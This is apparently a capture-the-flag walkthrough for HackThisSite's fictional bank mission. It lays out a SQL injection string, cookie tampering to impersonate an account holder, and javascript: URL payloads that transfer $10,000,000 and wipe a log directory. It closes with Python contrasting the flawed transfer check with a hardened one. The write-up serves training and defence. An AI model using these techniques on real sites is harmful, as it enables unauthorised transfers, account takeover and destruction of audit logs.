From aldeid
  • Level: Realistic::8 (United Banks Of America)
  • URL: http://www.hackthissite.org/missions/realistic/8/
  • Difficulty :
  • Exercise: One of America's Richest Men plans to donate $10,000,000 to a campaign set on hunting down hackers and locking them up. Please, if you can't do this, then we're all screwed. Can you hack in and move the money?

Message: Hey man, you gotta help me out, Gary Hunter, one of the richest men in America, has just deposited $10,000,000 into his bank account at the United Banks Of America and plans to donate that money to a campaign to hunt down and lock up all hackers. Now I've tried hacking their site but I'm just not good enough. That's why I need your help, Here's a list of your objectives:

  1. Find the account of Gary Hunter (I don't know his account name).
  2. Move the $10,000,000 into the account dropCash.
  3. Clear The Logs, They're held in the folder 'logFiles'.

I really hope you can do this, because if you can't we're all screwed

  • Solution:


From the navigation and the source code of the pages, we gather the following information:

Description, page and fields:

  • Register pages: Register.php > register2.php
      • <input type="text" name="username" maxlength=10>
      • <input type="password" name="password" maxlength=50>
      • <textarea name="desc" rows=5 cols=20 maxlength=255>
  • Login pages: login1.php > login2.php
      • <input type="text" name="username" value="Enter Username">
      • <input type="password" name="Password" value="">
  • Purge files: cleardir.php
      • <input type='hidden' name='dir' value='loginSQLFiles'>
  • Transfer money from one account to another: movemoney.php
      • <input type='text' name='TO' value='Username To Give Money To'>
      • <input type='text' name='AMOUNT' value='Amount Of Money To Move'>

Authentication cookie (created after successful authentication):

  • accountUsername=<login>
  • accountPassword=<password>

Our target:

  • Name: Gary Hunter
  • Transfer $10,000,000 into the account dropCash.
  • Log directory: logFiles

Objective 1: Find the account of Gary Hunter

First create your own account and log in. Once done, type the following command in the URL bar: javascript:alert(document.cookie); It shows our cookie value (the login and password in clear text), indicating that the site is vulnerable. Then go to the user info page and enter a SQL injection to show the list of all users: ' or 'a'='a.

By scrolling down, we find:

GaryWilliamHunter : -- $$$$$ --

The 2 values are separated by a colon:

  • Before colon: the login (GaryWilliamHunter)
  • After colon: the description (-- $$$$$ --)

Objective 2: Move the $10,000,000 into the account dropCash

By entering the following code in the URL, we see that the site is vulnerable to cookie injection because it displays the cookie information in clear text.


Install Firebug and Firecookie for Firefox. We then have to change the value of the cookie named "accountUsername" to "GaryWilliamHunter" and use the following JS injection (copy/paste in the URL):

javascript:void(document.write('<form method=post action=movemoney.php><input type=hidden name=TO value=dropCash /><input type=hidden name=AMOUNT value=10000000 /><input type=submit value=transfer /></form>'))

It dynamically writes a form on the page, containing the values needed for a transfer:

  • FORM ACTION: movemoney.php, as specified in the exercise
  • FROM: value taken from the modified cookie (GaryWilliamHunter)
  • TO: value of dropCash, as stated in the exercise. We know this field from the information we gathered.
  • AMOUNT: value specified in the exercise. We know this field from the information we gathered.

Submitting the form completes the stage.

Objective 3: Clear The Logs, They're held in the folder 'logFiles'

Copy/paste the following code in the URL:

javascript:void(document.write('<form method=post action=cleardir.php><input type=hidden name=dir value=logFiles /><input type=submit value="cover my tracks" /></form>'))
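
Objectives 2 and 3 work because the server trusts two client-controlled values: the accountUsername cookie as the source account and the hidden dir field as the directory to purge. The Python model below is an added example, not code from the original page or from the site, and shows the weak transfer check beside a corrected one. The session store, the "visitor" account, the balances and all function names are assumptions made for illustration.

```python
import secrets

# Constructed sample state; only the account names and field names come from the page.
SESSIONS = {}                       # session id -> username, held on the server
ALLOWED_DIRS = {"loginSQLFiles"}    # the only directory the purge form offers

def new_accounts():
    return {"GaryWilliamHunter": 10_000_000, "dropCash": 0, "visitor": 50}

def login(username):
    """Issue an unguessable session id (password check omitted here)."""
    sid = secrets.token_urlsafe(32)
    SESSIONS[sid] = username
    return sid

def _transfer(accounts, src, dst, raw_amount):
    try:
        amount = int(raw_amount)
    except (TypeError, ValueError):
        return "denied: bad amount"
    if src not in accounts or dst not in accounts or src == dst:
        return "denied: unknown account"
    if amount <= 0 or amount > accounts[src]:
        return "denied: bad amount"
    accounts[src] -= amount
    accounts[dst] += amount
    return "ok"

def move_money_vulnerable(cookies, form, accounts):
    # Weak: the source account is whatever the accountUsername cookie claims.
    return _transfer(accounts, cookies.get("accountUsername"),
                     form.get("TO"), form.get("AMOUNT"))

def move_money_hardened(cookies, form, accounts):
    # Corrected: the source account is looked up from server-side session state.
    src = SESSIONS.get(cookies.get("session", ""))
    if src is None:
        return "denied: not authenticated"
    return _transfer(accounts, src, form.get("TO"), form.get("AMOUNT"))

def clear_dir_hardened(form):
    # The hidden 'dir' field is client input, so it is checked against an allowlist.
    return "ok" if form.get("dir") in ALLOWED_DIRS else "denied: directory not allowed"
```

With the hardened handler an edited accountUsername cookie is ignored, so the transfer is debited from the session owner's own balance or refused.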